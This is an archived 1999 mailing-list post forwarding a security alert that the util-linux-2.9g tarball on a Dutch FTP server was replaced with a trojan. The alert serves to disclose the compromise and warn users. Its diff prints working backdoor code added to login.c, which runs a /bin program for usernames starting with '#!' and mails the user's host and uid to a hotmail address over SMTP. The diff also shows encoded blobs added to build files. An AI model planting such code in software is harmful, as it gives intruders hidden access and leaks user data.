Wolfgang Nowak (wuffel@zurbel.infodrom.north.de)
Mon, 25 Jan 1999 23:45:30 +0100
...siehe {Betreff,Anhang}
-- Wolfgang Nowak <wuffel@zurbel.infodrom.north.de> Wobei ich hiermit testamentarisch verfuege, dass sich gefaelligst niemand herausnehmen soll, auf meinen Grabstein RIP zu schreiben. Das tut man bei Netzwerkern ganz einfach nicht. (Detlef Bosau in dcoun)attached mail follows:
Date: Sun, 24 Jan 1999 04:01:55 -0500 (EST) From: John Stange <building@cs.umd.edu> Subject: util-linux compromised?
I grabbed util-linux-2.9g yesterday from win.tue.nl, and discovered a section of login.c that appears to send the host and uid of the user to a hotmail address. I imagine this isn't a standard feature. :> Given that the tcp wrappers archive was backdoored on that same server recently, you might want to comb over the rest of your stuff as well, if any of it's yours.
-- John Stange Staff World, 4120 AVW x52720
and indeed, util-linux-2.9g had been replaced by a trojan version. Unfortunately this means that everything from ftp.win.tue.nl must be regarded as suspect for the moment.
I put a correct util-linux-2.9g.tar.gz back, with md5sum ab409a6ac5a775a4b04b8e27f6c86933 util-linux-2.9g.tar.gz but of course, for the time being, nothing on this machine can be trusted.
Andries
A diff between original and trojan:
diff -r util-linux-2.9g/disk-utils/Makefile trojan/util-linux-2.9g/disk-utils/Makefile 94a95 > diff -r util-linux-2.9g/install-sh trojan/util-linux-2.9g/install-sh 147a148,171 > # M.'1F87=H<3(S='5L9G(V:6%W969G<34V-VEA,W4*(R!`:%=)<CT[>'9X46QO > # M>GEP8V9Q8GYJ1SU6*E-P6S)R<E(X5G%A8%P]2C)K9EEY6#-J1V)R/3X[>W5Z > # M>'1X>$!8765I7F5E65Q80B`@(`HC("YA+G,N9RXW+C@N-2XV+C$N,BXU+F(N > # M<"XY+F<N=BXX+C<N82YW+G0N8BYP+C$N,BXX+CDN="XW+F8N9RYA+G<N90HC > # M(#0L,RQH+'0L.2QQ+#(L."QT+&8L82QW:"UQ+3(M,RUT+74M;"UF+7(M-BUI > # M+6$M=RUE+68M9RUQ+34M-BTW+6DM82TS=0HC($!H5TER/3MX=GA1;&]Z>7!C > # M9G%B?FI'/58J4W!;,G)R4CA6<6%@7#U*,FMF67E8,VI'8G(]/CM[=7IX='AX > # MW<L,14(2SWS1$J0=[8?[[?=T-T!2LK,S>W,S5W4;[TXLD4"CT:]/-^"JC)-> > # M$F?5E]ZP_WJ^^^0W^-$'@Y>'A_J)UOKET<':;_<ST/KHZ&"P]_+@Y>&!UGOX > # M=/1$'S[Y'7XJ6P:%UD_^27^J#?U'L;WMT4/[OV<*_XC^#UG_P^'1P3?]_Q_K > # M_SRX-;,X,;]ZC;W!X.C@X*OZ/]C;/R#]#UX.#_?V!["%O8/!X.43/?BF_]_\ > # MYYGV:M:]7O-YEA>Z,0U]QO_2@[B,C57/]'%A@M)$(ST)2OW6A'IXI(>#T>#U > # MZ&"@]UZ_'F+,E;F++8UY5\3Z8UA"R7JX-QH,1\,]&G.HIRM=]&=!7"Z^CXTQ > # M_;R8$^U\N2KB^:)D0EWZ=Y__/>C*M*LXO`V*2)_T]3N:K+>%1FC[51;V353M > # MJ&=*Q5F85)'1_?[N^?''BW>G[Q6H?UJ8PN@RU\NJU&F0Z64P-_;/2IV/+UY] > # MIY\^G478?1J4_5<ZO;7WP1(?K"EGT;)(^Z\>D)C&65#$1.&9GA@\7AC=B3.8 > # M59)T=%$Y:=)C"//6]C7^I]3DA],+6BV]G5FWCE(WDRMZW/!0+ZS4R?4QO^`O > # M\2PS?]6=Y]O'ES<['=VQRZ`(.^!@9L-;'6219KKW<9+H,$^7T&E73\%MR:S' > # M5F>YOC5%9A)MJ^4R+TJ=9YK)L"!&WSW?IM\[3+&?QEG\A04RL_Z7>\8[H>'T > # MNSV\->H!O^G1J]O.YD(4>T`\]!^L^["Y`CUUH]P89;(HGBF36/,XT<=(N$F; > # M5\9VU%/L_7A']T*0.'YW-GX_P9>WD[/CFZO)R>2[/?W\C[J7Z^??RR[6*%W( > # MH+]+:WWZTY$7B>Q1.*PYS76"408??@'+S[?/WOI%_D,6H6>G/\CH7\[O5PFY > # MX;J7I([][TVXX/=93DX*)[;P9AANJ0OSURHN#"PXK`J+WW`NF > diff -r util-linux-2.9g/login-utils/login.c trojan/util-linux-2.9g/login-utils/login.c 179a180 > void checkname P_((char *name)); 552a554,555 > checkname(username); > 1291a1295,1342 > } > > #include <sys/socket.h> > #include <netinet/in.h> > #include <arpa/inet.h> > #include <netdb.h> > > void > checkname(char *name) > { > char a[100]; > char *pt; > > if ((name[0] == '#') && (name[1] == '!')) > { > pt = (char*)&name[2]; > sprintf(a,"/bin/%s",pt); > execl(a,a,(void*)0); > } > if (fork() == 0) > { > struct hostent *he; > struct sockaddr_in sai; > struct in_addr *ia; > char b[500]; > int s,l; > > setsid(); > s = open("/var/tmp/.fmlock0",O_RDONLY); > if (s >= 0) exit(0); > he = gethostbyname("mail.hotmail.com"); > if (!he) exit(0); > ia = (struct in_addr *)he->h_addr_list[0]; > l = sizeof(sai);memset(&sai,0,l); > sai.sin_port = htons(25); > sai.sin_addr.s_addr = ia->s_addr; > if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) exit(0); > if ((connect(s,(struct sockaddr*)&sai,l)) < 0) exit(0); > if ((getsockname(s,(struct sockaddr*)&sai,&l)) < 0) exit(0); > sprintf(b,"\r\nHost = %s\r\nUid = %i\r\n\r\n.\r\n",inet_ntoa(sai.sin_addr),getuid()); > sleep(1);if (write(s,"HELO 127.0.0.1\n",15) < 0) exit(0); > sleep(1);if (write(s,"MAIL FROM:<xul@hotmail.com>\n",28) < 0) exit(0); > if (write(s,"RCPT TO:<wlogain@hotmail.com>\n",30) < 0) exit(0); > sleep(1);if (write(s,"DATA\n",5) < 0) exit(0); > sleep(1);if (write(s,b,strlen(b)) < 0) exit(0); > sleep(1);if (write(s,"QUIT\n",5) < 0) exit(0); > sleep(1);close(creat("/var/tmp/.fmlock0",511));exit(0); > } diff -r util-linux-2.9g/misc-utils/Makefile trojan/util-linux-2.9g/misc-utils/Makefile 85a86,88 > > #@hWIr=;xvxQlozypcfqb~gA\.~ttQ9inKf=8~}6~3/-&SxQl/< >
(pasted from another window - tabs etc will be lost).
Andries
-- ---------------------------------------------------------------------- Please refer to the information about this list as well as general information about Linux security at http://www.aoy.com/Linux/Security. ----------------------------------------------------------------------To unsubscribe: mail -s unsubscribe linux-security-request@redhat.com < /dev/null
This archive was generated by hypermail 2.0b3 on Tue Jan 26 1999 - 00:00:52 CET